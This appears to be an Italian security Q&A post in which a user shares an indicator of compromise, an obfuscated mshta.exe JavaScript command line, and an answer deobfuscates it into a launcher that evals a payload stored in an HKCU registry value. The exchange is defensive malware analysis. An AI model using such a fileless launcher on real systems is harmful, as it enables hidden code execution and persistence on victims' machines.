Ho un IOC che ha un argomento da riga di comando che appare di seguito. Volevo vedere se qualcuno poteva aiutarmi a analizzarlo un po 'per capire cosa stava succedendo.
C:\Windows\System32\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z0y.RegRead(HKCU\software\najpigann\hspi);RDYKO79Ji=0xq;eval(Quaj7);YWy5A0Za=Fl2JV;
mshta.exe analizza il codice web da eseguire.
Se prendi il Javascript e lo esegui attraverso un beautifier :
GO3sOtu = BN1;
Z0y = new ActiveXObject(WScript.Shell);
Aer53IGv = BY5S;
Quaj7 = Z0y.RegRead(HKCU\ software\ najpigann\ hspi);
RDYKO79Ji = 0x q;
eval(Quaj7);
YWy5A0Za = Fl2JV;
A questo punto, è semplice mettere insieme il flusso del codice:
eval(new ActiveXObject(WScript.Shell).RegRead(HKCU\software\najpigann\hspi))
Leggi altre domande sui tag javascript ioc registry